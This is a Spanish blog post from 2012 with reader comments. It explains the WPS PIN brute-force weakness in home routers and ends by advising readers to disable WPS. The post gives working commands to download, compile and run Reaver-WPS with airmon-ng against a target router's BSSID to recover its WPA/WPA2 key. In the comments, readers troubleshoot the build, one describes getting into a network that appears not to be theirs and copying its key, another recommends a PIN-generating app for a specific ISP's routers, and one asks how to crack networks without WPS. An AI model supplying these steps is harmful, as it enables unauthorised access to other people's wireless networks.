Barceló

viernes, 17 de febrero de 2012

Descifrando cualquier WPA2/WPA/WEP en horas mediante WPS



Hace unos meses cuando probé mi nuevo router, y vi que traía WPS (QSS en el caso de mi TP-LINK), me dió un poco de yuyu. Con un PIN de 8 dígitos te podías conectar sin problema, sin necesidad de clave WPA o WEP, de hecho cuando metes el PIN correctamente el router te devuelve la clave para que te asocies a la "vieja usanza".

Hay 3 formas de conectar por WPS:
  • Mediante el botón de pulsar para conectar (necesitamos acceso físico al dispositivo)
  • Configurando en el router (interfaz web normalmente) el PIN de la tarjeta WIFI que queremos conectar.
  • Mediante el PIN del router (esto es realmente el problema y lo que permite realizar ataques de fuerza bruta)
  Realmente ya es una cagada muy grande. Si hasta incluso yo hace unos meses me quedé pensando en esto (si no experimenté más fue porque no tengo tiempo), cualquiera podría haberse dado cuenta.

Ah, pero que aún es peor de lo que parece. Según lo que tengo entendido hay dos clases de routers:
  • Los "listos", como el mío, necesitan los 8 dígitos para saber si la clave es correcta.
  • Los "tontos", que sólo con los 4 primeros dígitos ya te dicen si el PIN va bien o no, lo que reduce considerablemente el crackeo.
Crackeo propiamente dicho

  La herramienta usada para esto se llama Reaver-WPS. La última versión en este momento es la 1.4. Nos la descargamos, extraemos y compilamos.

wget http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz
tar -xvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install

  Ejecutarlo y que funcione es tal que así, suponiendo que nuestra tarjeta wifi es wlan0 y que tenemos el paquete aircrack-ng instalado (para airmon-ng). Recordamos que el BSSID es el MAC inhalámbrico del router.  

airmon-ng start wlan0 
sudo ./reaver -i mon0 -b BSSID 

  Y ya está. Nos ponemos a esperar que le llevará unas horitas. Necesita una buena señal para que no se pierdan los paquetes, si no tendrá que estar reenviándolos todo el rato y perderemos mucho tiempo, en vuestras casas con vuestros routers no tendréis problema.

Recordad, ¡desactivad el WPS! Aún no se sabe de ninguna solución ni parche.

Un saludo!

13 comentarios:

  1. hola que tal tengo problemas en la instalacion me puedes ayudar al colocar este comando /detail?name=reaver-1.4.tar.gz en la consola me dice que se encuentra ese archivo

    ResponderEliminar
  2. Estás cortando mal el comando, el comando entero es:

    wget http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz

    ResponderEliminar
  3. me gustaría comentar que probé el Reaver-WPS. 1.4 en redes wpa2-psk con el wps activado y de lujo, encontre una wpa2-psk con el wps desactivado y me decidí probar igualmente el programa haber que votaba y mi experiencia fue que voto la clave encriptada eso no me servia, pero también me dio el pin y listo me asocie mediante el pin estando asociado entre al router y ya dentro copie la clave , espero le sirva a alguien

    ResponderEliminar
  4. a mi igual me votó una clave y no me sirvió,como me conecto con el pin que me dió???? ayuda !!

    ResponderEliminar
    Respuestas
    1. Asumiendo que es tu propia red, en Windows te lo suele pedir de forma automática y en Linux es configurando wpa_supplicant.

      Eliminar
  5. perdon por la ignorancia pero como uso ese codigo osea, como lo descargo al programa propiamente dicho?

    wget http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz
    tar -xvf reaver-1.4.tar.gz
    cd reaver-1.4/src
    ./configure
    make
    sudo make install

    ResponderEliminar
    Respuestas
    1. Te disculpo la ignorancia, pero si no sabes descargar el programa tienes que leer un poco más, es lo más básico.

      Eliminar
    2. lo que puedes hacer es descargar manualmente el paquete, lo colocas en documentos o donde tu quieras, despues tienes que entrar a la ruta donde esta alojado ese archivo y ahi usas esto:
      cd/home/nombreusuario/Documentos
      despues hacer tar xzvf nombredelarchivo
      esperas a que se descomprima despues te metes a esa carpeta y usas: cd reaver-1.4/src
      y ahi haces el ./configure
      make
      sudo make install
      pero antes de eso isntalar esto o te dara error al compilar
      sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev y es todo

      Eliminar
  6. les quiero compartir una aplicacion que se llama WPSPIN la encuentran en aptoide o en market esta aplicaccion te da el PIN CORRECTO al instante.

    solo dos requisitos[que la red sea infinitum:ejem:infinitumf5932 o mas numeros omenos.

    tambien que tengan el wps activado lo probe en mi cell

    ResponderEliminar
  7. y realmente funciono solo copie el PIN en papel y me fui a wifi buscamos la red que obtuvimos el PIN le damos en donde te pide la clave{despues le damos en ¨;MOSTRAR OPCIONES AVANSADAS[ se nos abre la opcion WPS PINCHAMOS Y LE DAMOS EN ¡¡PIN DE PUNTO DE ACCESO== por ultimo escribimos el pin de 8 digitos y esperamos un poco listo¡¡¡¡¡¡¡¡ esta aplicacion es mucho mejor que wifislax 3.5 o en todas susverciones con reaver. ¡¡¡recuerden solo con redes que sean INFINITUM no importa de cuantosdigitos sea espero les funcione

    ResponderEliminar
  8. Me podrias dar los consejos o si sabes como descifrar una red con wps desactivado por favor

    ResponderEliminar
  9. para eso esta mejor el xioapan y no hay que meter comandos ni historias..valientes enteraos hay por aqui

    ResponderEliminar
  10. no encuentro la opcion de poner el pin. en opciones avanzadas no me sale.

    ResponderEliminar